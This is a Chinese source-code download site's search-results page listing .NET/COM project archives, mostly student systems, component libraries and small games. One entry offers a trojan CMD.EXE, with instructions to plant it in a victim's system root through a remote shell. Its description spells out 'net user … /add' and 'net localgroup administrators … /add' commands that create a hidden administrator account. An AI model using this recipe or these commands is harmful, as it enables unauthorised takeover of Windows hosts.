Welcome![Sign In][Sign Up]
Location:
Search - .Net COM

Search list

[Windows DevelopASP.NET的学生信息管理系统

Description: 系统是一个集成多功能的信息管理系统,有教师资料管理、学生管理、班级管理、专业管理、课程管理、成绩管理和院系管理功能模块。 充分利用了Asp.net2.0中的GridView、Datalist、SiteMap等新控件,数据库采用Sql2000,利用了存储过程 用户实现了超级管理员和普通用户的分级管理 默认管理员账号:lolo,密码beijing 该系统为lolo的毕业设计作品,欢迎大家多提宝贵意见losuelo@163.com! App_Data下是数据库文件,附加即可,数据库配置文件在web.config中设置
Platform: | Size: 435174 | Author: shuijingang@sina.com | Hits:

[ISAPI-IEInfragistics_Netadvantage_2004_Vol_1

Description: 基于COM、.NET & ASP.NET的表示层组件集
Platform: | Size: 12553216 | Author: 站长 | Hits:

[Windows DevelopOReilly - COM and .NET Component Services Source C

Description: OReilly - COM and .NET Component Services Source Code-OReilly- COM and. NET Component Services Source Code
Platform: | Size: 4483072 | Author: 站长 | Hits:

[Othercmd漏洞源代码

Description: 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
Platform: | Size: 18432 | Author: 姜振 | Hits:

[Documentsttxx.com

Description: asp.net 圈占源代码-restricted Asp. Net source code
Platform: | Size: 893952 | Author: 阿丹 | Hits:

[GUI Developvcqq

Description: vc.net编写的一个仿qq程序支持添加删除好友及头像选择等功能-vc.net prepared a fake qq supports adding friends and delete functions of the head choice
Platform: | Size: 209920 | Author: 檀超 | Hits:

[Multimedia DevelopMP3播放器35353876

Description: 此软件是用vb.net写的希望大家喜欢 作者:王泽民 四川工业大学2002级信息工程专业 大三学生,快要毕业了,我希望能找个好的工作 我喜欢用vb.net c# vc++.net写程序 联系我:87722467 QQ:182443355 Email:lmai111@163.com-this software is written using vb.net hope you like the author : Wang Zemin, Sichuan University 2002 Information Engineering junior students will soon graduate, I hope to find a good job I like vb.net c# vc. Net written procedures contact me : 87722467 QQ : 182443355 Email : lmai111@163.com
Platform: | Size: 1018880 | Author: 王泽民 | Hits:

[xml-soap-webservicenetmatters040616380

Description: 1、我想从某个方法中使用该方法的 XML 说明文档,这可能吗?... 2、我想在运行时访问一个 COM 组件,但我没有对应的 interop 程序集。我还能使用它吗?我曾考虑在需要时动态生成一个程序集,但这 样做似乎有些过度。问题是我正在编写一个.NET的通用工具类,在编译时不知道该 COM 组件的 ProgID。而这个组件实现了 IDispatch 接口。-one, I think from a certain method to use the methods of XML documentation, which could? ... Two, I want to run a visit to COM, but I have no response to the procedures set interop. I still use it? I have to consider the need to create a dynamic collection procedures, but it seemed to some excessive. The problem is I was preparing one.NET common tools category, the compiler does not know when the COM the ProgID. While the components to achieve the IDispatch interface.
Platform: | Size: 133120 | Author: 萧鹏 | Hits:

[SQL ServerAjun全站程序

Description: === ===欢迎访问yuanma8.com====================== 网站编程技术专题站,提供大量ASP、PHP、JSP、CGI、.NET软件,网页模板和黑客工具 常用工具,还有技术专题论坛等着您的参与及讨论。-=== === === visit the website yuanma8.com ====================== thematic programming stations, a large number of ASP, PHP, JSP, CGI,.NET software, web templates and hacking tools commonly used tools, technical forums waiting for your participation and discussion.
Platform: | Size: 1235968 | Author: 杨杨 | Hits:

[GUI Developcwebpage

Description: Display a Web Page in a Plain C Win32 Application: There are numerous examples that demonstrate how to embed Internet Explorer in your own window. But these examples typically use Microsoft Foundation Classes (MFC), .NET, C#, or at least the Windows Template Library (WTL) because those frameworks have pre-fabricated "wrappers" to easily give you an "HTML control" to embed in your window. If you re trying to use plain C, without MFC, WTL, .NET, C#, or even any C++ code at all, then there is a dirth of examples and information how to deal with OLE/COM objects such as IE s IWebBrowser2. Here is an article and working example in C to specifically show you what you need to do in order to embed IE in your own window, and more generally, show you how to interact with OLE/COM objects and create your own objects in plain C.
Platform: | Size: 48128 | Author: 刘国栋 | Hits:

[CSharp精美的ASP.NET日期选择器r

Description: 精美的ASP.NET日期选择器r.rar 来自网站www.code173.com-attractive choice for ASP.NET date from the site www.code173.com r.rar
Platform: | Size: 69632 | Author: 傲威 | Hits:

[CSharp梦凌.NET网站自动更新系统t

Description: 梦凌.NET网站自动更新系统t.rar 来自网站www.code173.com-Meng Ling.NET system t.rar automatic updates from the website www.code173.com
Platform: | Size: 180224 | Author: 傲威 | Hits:

[Windows DevelopAdvanced .NET Framework (GDI+) - Create a Screensa

Description: .net下的GDI+开发源码。Net中的异常处理语义是基于类型的,所以你可以创建具有自己的属性和方法的自定义异常。.Net中异常是最重要的一个概念,并且因为它是内建的错误 处理机制,因此所有.NET兼容的语言都必须支持异常。另外, .Net 代码可以将COM+ 服务作为企业服务(Enterprise Services)来获得-. net under GDI+ development source. Net of exception handling is based on the type of semantics, so you can create with its own properties and methods of self-definition of abnormal. . Net abnormal is the most important concept, and because it is built-in error handling mechanism, all. NET-compliant languages must support the anomaly. In addition,. Net code can COM+ Services as business services (Enterprise Services) to obtain
Platform: | Size: 50176 | Author: 孙炜 | Hits:

[Windows Develop狂人论坛

Description: C#.NET+SQL,标准三层架构,全源码提供,代码优化,数据库设计严格。 论坛整合了一个企业版本的访问统计,大家可以访问www.asp600.com查看具体介绍。 项目WebClassHighlighting并没有使用,是用来代码高亮显示的,目前支持三种代码XML,VB,C#,大家自己研究吧。 关于Jmail发送大家可以看Web.config和webclassone中的类文件。 关于后台管理,其实左边的栏目是可以动态改变的,管理端没有公布,大家只要看一下数据库就知道如何使用。 接下来的时间我会公布一个代码生成器,使用项目DbClass中的类来生成应用代码,可支持生成存储过程和普通SQL语句。 关于后台版块管理里面的图片上传,这是一个公共的图片上传类,大家可仔细研究一下。-Madman forums, C
Platform: | Size: 2161664 | Author: 刘原奇 | Hits:

[Other Riddle gamesVS.net开发俄罗斯方块

Description: 经典的俄罗斯方块,用VS.net的VC7.0编写,重点实现了计时器的作用。 程序中的方块都是用DC画成。代码简洁,程序体积很小。 E-mail: hackerqc@gmail.com-classic Tetris with the VC7.0 VS.net prepared, focused and the role of the timer. The procedures are ideographic DC paint. Simple code, procedures small size. E-mail : hackerqc@gmail.com
Platform: | Size: 60416 | Author: 覃超 | Hits:

[GUI DevelopInfragistics NetAdvantage 2005 Vol 1 Source Code.p

Description: 功能介绍:1.基于COM、.NET 和ASP.NET 的75种最佳表示层组件:包括网格、图表、工具条、菜单、制表符、树状子目录结构、进度表、日历、编辑器、GUI控件以及更多…2.利用Infragistics的表示层构架可用于继承并创建自定义组件的图形界面跨环境的通用对象模块提供更方便的在线学习 3.支持WindowsXP功能。4.RAD 设计器提升了可视化设计的速度。5.使用NetAdvantage's ASP.NET组件可以在瘦客户端环境中创建胖客户端的应用程序。6.提供ASP.NET组件的服务器端应用程序接口(API)7.应用广泛、直观的对象模块,包括了丰富的事件、方法和属性集合,可进行细化至象素水平的编程8.跨环境的通用对象模块提供更方便的在线学习-functional presentations : 1. COM,.NET and ASP.NET said the 75 best-components include : grids, charts, toolbars, menus, tabs, tree subdirectory structure, schedules, calendars, editors, GUI controls, and more ... 2 . Infragistics said the use of the layer structure can be used to inherit and create a custom graphical interface components of the environment across the Common Object Module provide more convenient online learning 3. WindowsXP support functions. 4.RAD design for improved visual design speed. 5. NetAdvantage's use ASP.NET components in the thin client environment can be created fat client applications. 6.NET components for the server-side application programming interface (API) 7. Widespread use, intuitive object modules, including a wealth of events, methods and attribu
Platform: | Size: 10000384 | Author: 客户 | Hits:

[OA中国工商网电子商务购物中心系统EMall v1.0

Description: 完全公开源代码,并无任何许可限制 特别基于大型电子商务网站的系统开发 Microsoft SQL Server 2000后台数据库,充分应用了存储过程的巨大功效 基于类模块的扩展数据访问能力支持任何类型的大型数据库 加密用户登录信息(cookie) 易于安装的系统和应用功能 100%的asp.net的代码,没有COM,java或者其他的格式 完全基于MS建议的系统安全设计 最佳的应用程序,数据库和安全设定 MS建议的最佳用户密码管理设定 极强的系统性能与伸缩性 大量应用缓存以提升系统的性能和浏览速度 方便的功能可伸缩设计-completely open-source, no special license restrictions on the large-scale e-commerce site development system for Microsoft SQL Server 2000 database background, the use of the storage process based on the effectiveness of the tremendous expansion module type data access capability to support any type of large-scale database encryption users login information ( cookie) easy-to-install system and application functions Asp. net 100% of the code, no COM, or other java entirely based on the format recommended by the MS design the best system security applications, databases and security settings recommended by the MS best user password management system set strong Properties and application scalability large cache to boost system performance and viewing convenience features scalable design
Platform: | Size: 935936 | Author: 陈睿 | Hits:

[GUI Developcsharp net Source

Description: There is no license fee or royalty fee to be paid at any time for using the Magic Library. You are however requested to acknowledge the use of the library and provide a link to our home page www.dotnetmagic.com from the About box of your application. You may include the source code, modified source code, signed assembly or modified built assembly within your own projects for either personal or commercial use but excluding the restrictions outlined below. The following restrictions apply to all parts of the library, including all source code, assemblies, samples and documentation... The above items cannot be sold as is, either individually or together. The above items cannot be modified and then sold as a library component, either individually or together. In other words, if you are using the library to enhance your project then you are fine. If you are trying to gain commercically from the library itself rather than using it to enhance your own work then you are prohibited from its use.-There is no license fee or royalty fee to be paid at any time for using the Magic Library. You are however requested to acknowledge the use of the library and provide a link to our home page www.dotnetmagic.com from the About box of your application. You may include the source code, modified source code, signed assembly or modified built assembly within your own projects for either personal or commercial use but excluding the restrictions outlined below. The following restrictions apply to all parts of the library, including all source code, assemblies, samples and documentation... The above items cannot be sold as is, either individually or together. The above items cannot be modified and then sold as a library component, either individually or together. In other words, if you
Platform: | Size: 285696 | Author: 刘发发 | Hits:

[Linux-Unixcygwin-ug-net.pdf

Description: 有助于Linux和ARM Linux系统下的编译调试,如果需要更新,可以到www.cygwin.com网站download。-help ARM Linux and the Linux system debugging compiler, if need updating, www.cygwin.com website can download.
Platform: | Size: 346112 | Author: 秋实 | Hits:

[Internet-Network发现网络中的活动主机

Description: 关键字: socket, 校验和算法, ICMP, connect, 端口,扫描, 这是我课程设计时,用VC.NET写的一个程序,功能是在利用socket提供的API函数, 填充并发送ICMP包,测试指定IP地址段中活动主机. 使用简单的connect方法来测试目的端口是否可通.并附带了校验和算法.希望更多的人与我交流, QQ:270596846 e_mail:chmuggmwtg@163.com-keyword : socket, the checksum algorithm, ICMP, connect, ports, scanning, This is my course design, with VC.NET write a procedure, function is the use of the socket API function, filling and send ICMP packets, test specify the IP address of the host activities. use a simple way to connect the purpose of testing whether the port- . fringe and the checksum algorithm. hope more people shared with me, QQ : 270596846 Lord : chmuggmwtg@163.com
Platform: | Size: 13312 | Author: 陈成 | Hits:
« 1 2 3 4 56 7 8 9 10 ... 50 »